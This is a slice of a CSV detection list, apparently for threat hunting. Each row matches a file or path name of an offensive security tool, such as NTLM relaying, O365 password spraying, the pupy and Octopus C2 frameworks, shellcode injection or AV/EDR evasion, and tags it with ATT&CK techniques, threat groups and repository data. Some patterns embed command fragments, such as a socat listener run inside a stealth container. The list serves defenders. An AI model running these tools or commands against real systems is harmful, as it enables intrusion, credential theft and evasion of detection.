"*/ntlmrelayx.py*",".{0,1000}\/ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","1","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","9298"
"*/ntlmrelayx/*",".{0,1000}\/ntlmrelayx\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","9299"
"*/ntlmrelayx/*",".{0,1000}\/ntlmrelayx\/.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","9300"
"*/ntlmscan.git*",".{0,1000}\/ntlmscan\.git.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","9301"
"*/ntlmscan/*",".{0,1000}\/ntlmscan\/.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","9302"
"*/NTLMSleuth.git*",".{0,1000}\/NTLMSleuth\.git.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","9303"
"*/NtlmThief.git*",".{0,1000}\/NtlmThief\.git.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","9304"
"*/ntlmtransport.go*",".{0,1000}\/ntlmtransport\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","9305"
"*/ntlmUserPasswords.ntlm*",".{0,1000}\/ntlmUserPasswords\.ntlm.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","9306"
"*/ntlmutil.py*",".{0,1000}\/ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","9307"
"*/ntlmutil.py*",".{0,1000}\/ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","9308"
"*/ntlmv1.py*",".{0,1000}\/ntlmv1\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","9309"
"*/ntlmv1.py*",".{0,1000}\/ntlmv1\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9310"
"*/ntpescape.git*",".{0,1000}\/ntpescape\.git.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","9311"
"*/ntp-info.nse*",".{0,1000}\/ntp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9312"
"*/ntp-monlist.nse*",".{0,1000}\/ntp\-monlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9313"
"*/NtQuerySystemInformation.md*",".{0,1000}\/NtQuerySystemInformation\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","N/A","10","2124","286","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z","9314"
"*/NtRemoteLoad.exe*",".{0,1000}\/NtRemoteLoad\.exe.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","9315"
"*/NtRemoteLoad.git*",".{0,1000}\/NtRemoteLoad\.git.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","9316"
"*/NtRights/*",".{0,1000}\/NtRights\/.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","N/A","7","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9317"
"*/NtSetSystemInformation.md*",".{0,1000}\/NtSetSystemInformation\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","N/A","10","2124","286","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z","9318"
"*/Nuages_Cli*",".{0,1000}\/Nuages_Cli.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","9319"
"*/nuagesAPI.js*",".{0,1000}\/nuagesAPI\.js.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","9320"
"*/nullinux.git*",".{0,1000}\/nullinux\.git.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","9321"
"*/nullinux.py*",".{0,1000}\/nullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","9322"
"*/nullinux_users.txt*",".{0,1000}\/nullinux_users\.txt.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","9323"
"*/nxc --help*",".{0,1000}\/nxc\s\-\-help.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9324"
"*/nxc.exe*",".{0,1000}\/nxc\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9325"
"*/nxc/parsers/ip.py*",".{0,1000}\/nxc\/parsers\/ip\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9326"
"*/nxc/parsers/nmap.py*",".{0,1000}\/nxc\/parsers\/nmap\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9327"
"*/nxc-ubuntu-latest*",".{0,1000}\/nxc\-ubuntu\-latest.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9328"
"*/nysm bash*",".{0,1000}\/nysm\sbash.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9329"
"*/nysm -dr socat TCP4-LISTEN*",".{0,1000}\/nysm\s\-dr\ssocat\sTCP4\-LISTEN.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9330"
"*/nysm -r ssh *@*",".{0,1000}\/nysm\s\-r\sssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9331"
"*/nysm.bpf.c*",".{0,1000}\/nysm\.bpf\.c.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9332"
"*/nysm.git*",".{0,1000}\/nysm\.git.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","1","N/A","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9333"
"*/o365_enum_activesync.py*",".{0,1000}\/o365_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9334"
"*/o365_enum_office.py*",".{0,1000}\/o365_enum_office\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9335"
"*/o365_enum_onedrive.py*",".{0,1000}\/o365_enum_onedrive\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9336"
"*/o365_spray_activesync.py*",".{0,1000}\/o365_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9337"
"*/o365_spray_adfs.py*",".{0,1000}\/o365_spray_adfs\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9338"
"*/o365_spray_msol.py*",".{0,1000}\/o365_spray_msol\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9339"
"*/o365recon.git*",".{0,1000}\/o365recon\.git.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","9340"
"*/o365spray.git*",".{0,1000}\/o365spray\.git.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","1","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","9341"
"*/o365spray.py*",".{0,1000}\/o365spray\.py.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","1","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","9342"
"*/oab-parse/mspack.*.dll*",".{0,1000}\/oab\-parse\/mspack\..{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","9343"
"*/obfs3/obfs3.py*",".{0,1000}\/obfs3\/obfs3\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9344"
"*/obfuscate_strings.py*",".{0,1000}\/obfuscate_strings\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","9345"
"*/obfuscated_scripts/*",".{0,1000}\/obfuscated_scripts\/.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9346"
"*/Obfuscated-Code.py*",".{0,1000}\/Obfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","9347"
"*/ObfuscatedSharpCollection.git*",".{0,1000}\/ObfuscatedSharpCollection\.git.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","9348"
"*/obfuscation.exe --help*",".{0,1000}\/obfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9349"
"*/Obfuscator.py*",".{0,1000}\/Obfuscator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","9350"
"*/Obfuscator.py*",".{0,1000}\/Obfuscator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","9351"
"*/obfuscator/obfuscator.*",".{0,1000}\/obfuscator\/obfuscator\..{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","9352"
"*/octopus.asm*",".{0,1000}\/octopus\.asm.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","9353"
"*/Octopus.git*",".{0,1000}\/Octopus\.git.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","9354"
"*/octopusx64.asm*",".{0,1000}\/octopusx64\.asm.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","9355"
